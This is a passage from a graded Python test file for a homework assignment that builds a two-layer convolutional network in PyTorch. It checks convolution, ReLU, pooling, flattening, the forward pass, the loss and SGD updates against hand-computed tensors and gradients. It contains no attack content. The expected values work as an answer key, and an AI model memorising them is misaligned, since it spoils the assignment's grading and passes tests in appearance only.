[[[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.]], # the first channel of the feature map
[[0.,1.,1.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,1.,1.,1.,0.],
[0.,1.,1.,1.,0.,1.,0.,0.],
[0.,0.,1.,0.,1.,1.,1.,0.],
[0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,1.,0.,1.,1.,1.,0.]],# the second channel of the feature map
[[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,0.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.]]], # the third channel of the feature map
#---------- the feature map of the second image in the mini-batch ------
[[[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,1.,0.,1.]], # the first channel of the feature map
[[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.]],# the second channel of the feature map
[[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.]]] # the third/blue channel of the image
])
# 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 channels x 3 hight x 3 width)
W = th.tensor( [
#---------- the first filter with 3 input channels ------
[
[[1.,0.,1.],
[1.,0.,1.],
[1.,0.,1.]], # the first channel of the filter, trying to match a red-colored pattern '| |'
[[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], # the second channel of the filter, trying to match a green-colored pattern '+'
[[1.,0.,1.],
[0.,1.,0.],
[1.,0.,1.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
],
#---------- the second filter with 3 input channels ------
[
[[0.,1.,0.],
[1.,0.,1.],
[0.,1.,0.]], # the first channel of the filter, trying to match a red-colored pattern 'O'
[[1.,1.,1.],
[0.,0.,0.],
[1.,1.,1.]], # the second channel of the filter, trying to match a green-colored pattern '='
[[1.,0.,1.],
[0.,1.,0.],
[0.,1.,0.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
]
#---------------------------------------------------------
], requires_grad=True)
b = th.tensor([-15., # the bias for the first filter
-13.], # the bias for the second filter
requires_grad=True)
z = compute_z2(p1,W,b)
assert type(z) == Tensor
assert np.allclose(z.size(),(2,2,4,6))
#---------- the output on the first image in the mini-batch ------
z_true = [[[[-10., -8., -4., -11., 1., -13.],
[-11., -4., -8., -5., -6., -9.],
[ -8., -8., -4., -8., -5., -10.],
[-13., 1., -11., -4., -8., -10.]], # outputs of the first filter
[[ -9., 1., -7., -4., -6., -8.],
[ -7., -11., -4., -5., -4., -5.],
[ -6., -3., -5., -5., -9., -8.],
[ -8., -6., -4., -7., 1., -9.]]], # outputs of the second filter
#---------- the output on the second image in the mini-batch ------
[[[ 1., -13., -9., -13., -10., -8.],
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]], # outputs of the first filter
[[ -6., -8., -11., -9., -9., 1.],
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]] # outputs of the second filter
assert np.allclose(z.data,z_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dW_true = [[[[19., 21., 20.],
[21., 22., 21.],
[20., 21., 19.]],
[[23., 26., 22.],
[21., 24., 21.],
[22., 26., 23.]],
[[19., 21., 20.],
[16., 19., 17.],
[18., 20., 18.]]],
[[[19., 21., 20.],
[21., 22., 21.],
[20., 21., 19.]],
[[23., 26., 22.],
[21., 24., 21.],
[22., 26., 23.]],
[[19., 21., 20.],
[16., 19., 17.],
[18., 20., 18.]]]]
assert np.allclose(W.grad, dL_dW_true, atol= 0.1)
assert np.allclose(b.grad, [48,48], atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
s = np.random.randint(2,5) # size of the filter
h = s+np.random.randint(5,20) # hight of the image
w = s+np.random.randint(5,20) # width of the image
c1 = np.random.randint(2,10) # number of channels
c2= np.random.randint(2,10) # number of filters
p1 = th.randn(n,c1,h,w) # pooled feature map of the first convolutional layer
W = th.randn(c2,c1,s,s)
b = th.randn(c2)
z = compute_z2(p1,W,b)
assert np.allclose(z.size(),(n,c2, h-s+1,w-s+1))
#---------------------------------------------------
def test_compute_a2():
''' (2 points) compute_a2'''
# n=2, 2 filters, h = 4, w = 6
#---------- the linear logits on the first image in the mini-batch ------
z =th.tensor([[[[-10., -8., -4., -11., 1., -13.],
[-11., -4., -8., -5., -6., -9.],
[ -8., -8., -4., -8., -5., -10.],
[-13., 1., -11., -4., -8., -10.]], # outputs of the first filter
[[ -9., 1., -7., -4., -6., -8.],
[ -7., -11., -4., -5., -4., -5.],
[ -6., -3., -5., -5., -9., -8.],
[ -8., -6., -4., -7., 1., -9.]]], # outputs of the second filter
#---------- the linear logits on the second image in the mini-batch ------
[[[ 1., -13., -9., -13., -10., -8.],
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]], # outputs of the first filter
[[ -6., -8., -11., -9., -9., 1.],
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]], # outputs of the second filter
requires_grad=True)
a = compute_a2(z)
# check value
assert type(a) == Tensor
assert np.allclose(a.size(),(2,2,4,6))
#---------- the activations on the first image in the mini-batch ------
a_true = [[[[0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
#---------- the activations on the second image in the mini-batch ------
[[[1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0.]]]]
assert np.allclose(a.data, a_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in a)
L = a.sum()
# back propagation
L.backward()
# check the gradients dL_dz, which happens to equal to a_true in this test case.
assert np.allclose(z.grad, a_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
h = np.random.randint(5,20) # hight of the image
w = np.random.randint(5,20) # width of the image
n_filters = np.random.randint(2,10) # number of filters
z = th.randn(n,n_filters,h,w)
a = compute_a2(z)
assert np.allclose(a.size(),(n,n_filters, h,w))
#---------------------------------------------------
def test_compute_p2():
''' (2 points) compute_p2'''
#---------- the activations on the first image in the mini-batch ------
a = th.tensor([[[[0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
#---------- the activations on the second image in the mini-batch ------
[[[1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0.]]]],
requires_grad=True)
p = compute_p2(a)
# check value
assert type(p) == Tensor
assert np.allclose(p.size(),(2,2,2,3))
#---------- the pooled features on the first image in the mini-batch ------
p_true = [[[[0., 0., 1.],
[1., 0., 0.]],
[[1., 0., 0.],
[0., 0., 1.]]],
#---------- the pooled features on the second image in the mini-batch ------
[[[1., 0., 0.],
[0., 0., 1.]],
[[0., 0., 1.],
[1., 0., 0.]]]]
assert np.allclose(p.data, p_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in p)
L = p.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_da_true = [[[[1., 0., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
[[[1., 0., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[1., 0., 1., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0.],
[1., 0., 0., 0., 0., 0.]]]]
assert np.allclose(a.grad, dL_da_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
h = np.random.randint(5,20)*2 # hight of the image
w = np.random.randint(5,20)*2 # width of the image
n_filters = np.random.randint(2,10) # number of filters
a = th.randn(n,n_filters,h,w)
p = compute_p2(a)
assert np.allclose(p.size(),(n,n_filters, h/2,w/2))
# check gradient with multiple max values
a = th.tensor([[[[ 0., 1.],
[ 1., 0.]]]],requires_grad=True)
p = compute_p1(a)
t = p.sum()
t.backward()
dL_da_true = [[[[ 0., 1.],
[ 0., 0.]]]]
assert np.allclose(a.grad,dL_da_true,atol=1e-2)
#---------------------------------------------------
def test_flatten():
''' (2 points) flatten'''
#---------- the pooling results on the first image in the mini-batch ------
p = th.tensor([[[[0., 0., 1.],
[1., 0., 0.]],
[[1., 0., 0.],
[0., 0., 1.]]],
#---------- the pooling results on the second image in the mini-batch ------
[[[1., 0., 0.],
[0., 0., 1.]],
[[0., 0., 1.],
[1., 0., 0.]]]],requires_grad=True)
f = flatten(p)
# check value
assert type(f) == Tensor
assert np.allclose(f.size(),(2,12))
f_true = [[0., 0., 1., 1., 0., 0., 1., 0., 0., 0., 0., 1.], # flat feature of the first image in the mini-batch
[1., 0., 0., 0., 0., 1., 0., 0., 1., 1., 0., 0.]] # flat feature of the second image in the mini-batch
assert np.allclose(f.data, f_true,atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in f)
L = f.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dp_true = [[[[1., 1., 1.],
[1., 1., 1.]],
[[1., 1., 1.],
[1., 1., 1.]]],
[[[1., 1., 1.],
[1., 1., 1.]],
[[1., 1., 1.],
[1., 1., 1.]]]]
assert np.allclose(p.grad, dL_dp_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
h = np.random.randint(5,20) # hight of the image
w = np.random.randint(5,20) # width of the image
n_filters = np.random.randint(2,10) # number of filters
p = th.randn(n,n_filters,h,w)
f = flatten(p)
assert np.allclose(f.size(),(n,n_filters*h*w))
#---------------------------------------------------
def test_compute_z3():
''' (2 points) compute_z3'''
# batch_size = 4
# number of input features = 2
# input feature to the second layer on one mini-batch: 4 (batch_size) by 2 (p) matrix
f = th.tensor([[1.,1.], # the first sample in the mini-batch
[2.,2.], # the second sample in the mini-batch
[3.,3.], # the third sample in the mini-batch
[4.,4.]])# the fourth sample in the mini-batch
# weights of length 2
W3 = th.tensor([ 0.5, -0.4],requires_grad=True)
# bias
b3 = th.tensor(-0.3,requires_grad=True)
z3 = compute_z3(f,W3,b3)
assert type(z3) == th.Tensor
assert np.allclose(z3.size(), (4,)) # batch_size
z_true = [-0.2,-0.1, 0.0, 0.1]
assert np.allclose(z3.data,z_true, atol = 1e-2)
assert z3.requires_grad
# check if the gradients of W is connected to z correctly
L = th.sum(z3) # compute the sum of all elements in z
L.backward() # back propagate gradient to W and b
# now the gradients dL_dW should be
dL_dW_true = [10,10]
# here [10,10] of dL_dW is computed as the sum of the gradients in all the four samples.
# for the 1st sample, the gradient is x = [1,1]
# for the 2nd sample, the gradient is x = [2,2]
# for the 3rd sample, the gradient is x = [3,3]
# for the 4th sample, the gradient is x = [4,4]
# so the sum of the gradients will be [10,10]
assert np.allclose(W3.grad,dL_dW_true, atol=0.1)
# now the gradients of dL_db should be: 4
# here dL_db is computed as the sum of the gradients in all the four samples: 1+1+1+1 = 4
assert np.allclose(b3.grad,4, atol=0.1)
#---------------------------------------------------
def test_forward():
''' (2 points) forward'''
# Let's use a face detector example.
# The shape of the tensors are as follows:
# x: 2x3x10x10 (2 images, 3 channels, 10 height, 10 width)
# Convolutional Layer 1: 3 filters of size 3x3
# z1: 2x3x8x8 (2 images, 3 filter channels, 8 height, 8 width)
# a1: 2x3x8x8 (2 images, 3 filter channels, 8 height, 8 width)
# p1: 2x3x4x4 (2 images, 3 filter channels, 4 height, 4 width)
# Convolutional Layer 2: 2 filters of size 3x3
# z2: 2x2x2x2 (2 images, 2 filter channels, 2 height, 2 width)
# a2: 2x2x2x2 (2 images, 2 filter channels, 2 height, 2 width)
# p1: 2x2x1x1 (2 images, 2 filter channels, 1 height, 1 width)
# f: 2x2 (2 images, 2 flattened features)
# z3: 2 (2 images)
x = th.tensor([
#---------- the first image in the mini-batch (face type 1) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the second/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the third/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
],
#---------- the second image in the mini-batch (face type 2) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the second/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the third/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
]
#----------------------------------------------------
])
#---------------------------
# Layer 1: Convolutional layer
#---------------------------
# 3 filters of shape 3 x 3 with 3 channels (shape: 3 filters x 3 input channels x 3 hight x 3 width)
W1= th.tensor( [
#---------- the first filter for 'eye' detector ------
[
[[0.,0.,0.],
[0.,1.,0.],
[1.,0.,1.]], # the first channel (red color) of the filter
[[0.,0.,0.],
[0.,2.,0.],
[2.,0.,2.]], # the second channel (green color) of the filter
[[0.,0.,0.],
[0.,3.,0.],
[3.,0.,3.]] # the third channel (blue color) of the filter
],
#---------- the second filter for 'mouth' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[1.,1.,1.]], # the first channel of the filter
[[0.,0.,0.],
[2.,0.,2.],
[2.,2.,2.]], # the second channel of the filter
[[0.,0.,0.],
[3.,0.,3.],
[3.,3.,3.]] # the third channel of the filter
],
#---------- the third filter for 'eyebrow' detector ------
[
[[1.,1.,1.],
[0.,0.,0.],
[0.,0.,0.]], # the first channel of the filter
[[2.,2.,2.],
[0.,0.,0.],
[0.,0.,0.]], # the second channel of the filter
[[3.,3.,3.],
[0.,0.,0.],
[0.,0.,0.]] # the third channel of the filter
]
#---------------------------------------------------------
], requires_grad=True)
b1= th.tensor([-17., # the bias for the first filter
-29., # the bias for the second filter
-17.], # the bias for the third filter
requires_grad=True)
#---------------------------
# Layer 2: Convolutional layer
#---------------------------
# 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 input channels x 3 hight x 3 width)
W2= th.tensor( [
#---------- the first filter for 'face type 1' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]], # the first channel (eye channel) of the filter
[[0.,0.,0.],
[0.,0.,0.],
[0.,1.,0.]], # the second channel (mouth channel) of the filter
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]] # the third channel (eyebrow channel) of the filter
],
#---------- the second filter for 'face type 2' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]], # the first channel (eye channel) of the filter
[[0.,0.,0.],
[0.,0.,0.],
[0.,1.,0.]], # the second channel (mouth channel) of the filter
[[1.,0.,1.],
[0.,0.,0.],
[0.,0.,0.]] # the third channel (eyebrow channel) of the filter
]
#---------------------------------------------------------
], requires_grad=True)
b2= th.tensor([-4., # the bias for the first filter
-4.], # the bias for the second filter
requires_grad=True)
#---------------------------
# Layer 3: Fully-connected layer
#---------------------------
W3 = th.tensor([1., -1.], requires_grad=True)
b3= th.tensor(0.,requires_grad=True)
z3 = forward(x,W1,b1,W2,b2,W3,b3)
# check value
assert type(z3) == Tensor
assert np.allclose(z3.size(),(2,))
z3_true = [1., -1.]
assert np.allclose(z3.data, z3_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in p)
L = z3.sum()
# back propagation
L.backward()
# check the gradients
dL_dW1 = [[[[ 0., 0., -1.],
[ 2., 0., 2.],
[ 0., 0., 0.]],
[[ 0., 0., -1.],
[ 2., 0., 2.],
[ 0., 0., 0.]],
[[ 0., 0., -1.],
[ 2., 0., 2.],
[ 0., 0., 0.]]],
[[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]],
[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]],
[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]]],
[[[ 0., 0., 0.],
[ 2., 0., 1.],
[ 0., -2., 0.]],
[[ 0., 0., 0.],
[ 2., 0., 1.],
[ 0., -2., 0.]],
[[ 0., 0., 0.],
[ 2., 0., 1.],
[ 0., -2., 0.]]]]
dL_dW2 = [[[[ 0., 0., 0.],
[ 1., 0., 1.],
[ 0., 0., 0.]],
[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 1., 0.]],
[[ 0., 0., 0.],
[ 1., 0., 1.],
[ 0., 0., 0.]]],
[[[ 0., 0., 0.],
[-1., 0., -1.],
[ 0., 0., 0.]],
[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., -1., 0.]],
[[-1., 0., -1.],
[ 0., 0., 0.],
[ 0., 0., 0.]]]]
assert np.allclose(W1.grad, dL_dW1, atol= 0.1)
assert np.allclose(b1.grad, [0,0,0], atol= 0.1)
assert np.allclose(W2.grad, dL_dW2, atol= 0.1)
assert np.allclose(b2.grad, [1,-1], atol= 0.1)
assert np.allclose(W3.grad, [1,1], atol= 0.1)
assert np.allclose(b3.grad, 2, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,4) # batch size
s1 = np.random.randint(1,3)*2+1 # size of the filter
s2 = np.random.randint(1,3)*2+1 # size of the filter
c = np.random.randint(2,4) # number of color channels
c1 = np.random.randint(2,4) # number of filters
c2 = np.random.randint(2,4) # number of filters
h2 = np.random.randint(2,4) # hight after second CONV layer
w2 = np.random.randint(2,4)
h1 = h2*2 + s2 - 1
w1 = w2*2 + s2 - 1
h = h1*2 + s1 - 1 # hight of the image
w = w1*2 + s1 - 1 # width of the image
n_flat_features = c2*h2*w2
x = th.randn(n,c,h,w)
W1 = th.randn(c1,c,s1,s1)
b1 = th.randn(c1)
W2 = th.randn(c2,c1,s2,s2)
b2 = th.randn(c2)
W3 = th.randn(n_flat_features)
b3 = th.zeros(1)
z3 = forward(x,W1,b1,W2,b2,W3,b3)
assert np.allclose(z3.size(),(n,))
#---------------------------------------------------
def test_compute_L():
''' (2 points) compute_L'''
# batch_size = 4
# linear logits in a mini-batch
z = th.tensor([1.,-1., -1000, 1000.], requires_grad=True)
# the labels of the mini-batch: vector of length 4 (batch_size)
y = th.Tensor([0,1,0,1])
L = compute_L(z,y)
assert type(L) == th.Tensor
assert L.requires_grad
assert np.allclose(L.detach().numpy(),0.6566,atol=1e-4)
# check if the gradients of z is connected to L correctly
L.backward() # back propagate gradient to W and b
dL_dz_true = [ 0.1828, -0.1828, 0., 0.]
assert np.allclose(z.grad,dL_dz_true, atol=0.01)
#-----------------------------------------
# batch_size = 2
# linear logits in a mini-batch
z = th.tensor([-1000., 1000.], requires_grad=True)
y = th.Tensor([1,0])
L = compute_L(z,y)
assert L.data >100
assert L.data < float('inf')
L.backward() # back propagate gradient to W and b
assert z.grad[0]<0
assert z.grad[1]>0
#---------------------------------------------------
def test_update_parameters():
''' (2 points) update_parameters'''
#---------------------------
# Layer 1: Convolutional layer
#---------------------------
# 3 filters of shape 3 x 3 with 3 channels (shape: 3 filters x 3 input channels x 3 hight x 3 width)
W1= th.tensor( [
#---------- the first filter for 'eye' detector ------
[
[[0.,0.,0.],
[0.,1.,0.],
[1.,0.,1.]], # the first channel (red color) of the filter
[[0.,0.,0.],
[0.,2.,0.],
[2.,0.,2.]], # the second channel (green color) of the filter
[[0.,0.,0.],
[0.,3.,0.],
[3.,0.,3.]] # the third channel (blue color) of the filter
],
#---------- the second filter for 'mouth' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[1.,1.,1.]], # the first channel of the filter
[[0.,0.,0.],
[2.,0.,2.],
[2.,2.,2.]], # the second channel of the filter
[[0.,0.,0.],
[3.,0.,3.],
[3.,3.,3.]] # the third channel of the filter
],
#---------- the third filter for 'eyebrow' detector ------
[
[[1.,1.,1.],
[0.,0.,0.],
[0.,0.,0.]], # the first channel of the filter
[[2.,2.,2.],
[0.,0.,0.],
[0.,0.,0.]], # the second channel of the filter
[[3.,3.,3.],
[0.,0.,0.],
[0.,0.,0.]] # the third channel of the filter
]
#---------------------------------------------------------
], requires_grad=True)
b1= th.tensor([-17., # the bias for the first filter
-29., # the bias for the second filter
-17.], # the bias for the third filter
requires_grad=True)
#---------------------------
# Layer 2: Convolutional layer
#---------------------------
# 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 input channels x 3 hight x 3 width)
W2= th.tensor( [
#---------- the first filter for 'face type 1' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]], # the first channel (eye channel) of the filter
[[0.,0.,0.],
[0.,0.,0.],
[0.,1.,0.]], # the second channel (mouth channel) of the filter
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]] # the third channel (eyebrow channel) of the filter
],
#---------- the second filter for 'face type 2' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]], # the first channel (eye channel) of the filter
[[0.,0.,0.],
[0.,0.,0.],
[0.,1.,0.]], # the second channel (mouth channel) of the filter
[[1.,0.,1.],
[0.,0.,0.],
[0.,0.,0.]] # the third channel (eyebrow channel) of the filter
]
#---------------------------------------------------------
], requires_grad=True)
b2= th.tensor([-4., # the bias for the first filter
-4.], # the bias for the second filter
requires_grad=True)
#---------------------------
# Layer 3: Fully-connected layer
#---------------------------
W3 = th.tensor([1., -1.], requires_grad=True)
b3= th.tensor(0.,requires_grad=True)
# create a toy loss function: the sum of all elements in W1, b1, W2, b2, W3 and b3
L = W1.sum()+b1.sum() + W2.sum() + b2.sum() + W3.sum() + b3.sum()
# back propagation to compute the gradients
L.backward()
# now the gradients for both W1, b1, W2, b2, W3 and b3 are all-ones
# let's try updating the parameters with gradient descent
# create an optimizer for the parameters with learning rate = 0.1
optimizer = th.optim.SGD([W1,b1,W2,b2,W3,b3], lr=0.1)
# now perform gradient descent using SGD
update_parameters(optimizer)
# let's check the new values of the parameters
W1_new = [[[[-0.1, -0.1, -0.1],
[-0.1, 0.9, -0.1],
[ 0.9, -0.1, 0.9]],
[[-0.1, -0.1, -0.1],
[-0.1, 1.9, -0.1],
[ 1.9, -0.1, 1.9]],
[[-0.1, -0.1, -0.1],
[-0.1, 2.9, -0.1],
[ 2.9, -0.1, 2.9]]],
[[[-0.1, -0.1, -0.1],
[ 0.9, -0.1, 0.9],
[ 0.9, 0.9, 0.9]],
[[-0.1, -0.1, -0.1],
[ 1.9, -0.1, 1.9],
[ 1.9, 1.9, 1.9]],
[[-0.1, -0.1, -0.1],
[ 2.9, -0.1, 2.9],
[ 2.9, 2.9, 2.9]]],
[[[ 0.9, 0.9, 0.9],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1]],
[[ 1.9, 1.9, 1.9],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1]],
[[ 2.9, 2.9, 2.9],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1]]]]
b1_new = [-17.1, -29.1, -17.1]
W2_new = [[[[-0.1, -0.1, -0.1],
[ 0.9, -0.1, 0.9],
[-0.1, -0.1, -0.1]],
[[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1],
[-0.1, 0.9, -0.1]],
[[-0.1, -0.1, -0.1],
[ 0.9, -0.1, 0.9],
[-0.1, -0.1, -0.1]]],
[[[-0.1, -0.1, -0.1],
[ 0.9, -0.1, 0.9],
[-0.1, -0.1, -0.1]],
[[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1],
[-0.1, 0.9, -0.1]],
[[ 0.9, -0.1, 0.9],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1]]]]
b2_new = [-4.1, -4.1]
W3_new = [ 0.9000, -1.1000]
assert np.allclose(W1.data,W1_new,atol=1e-2)
assert np.allclose(b1.data,b1_new,atol=1e-2)
assert np.allclose(W2.data,W2_new,atol=1e-2)
assert np.allclose(b2.data,b2_new,atol=1e-2)
assert np.allclose(W3.data,W3_new,atol=1e-2)
assert np.allclose(b3.data,-0.1,atol=1e-2)
assert np.allclose(W1.grad,np.zeros((3,3,3,3)),atol=1e-2)
assert np.allclose(b1.grad,np.zeros(3),atol=1e-2)
assert np.allclose(W2.grad,np.zeros((2,3,3,3)),atol=1e-2)
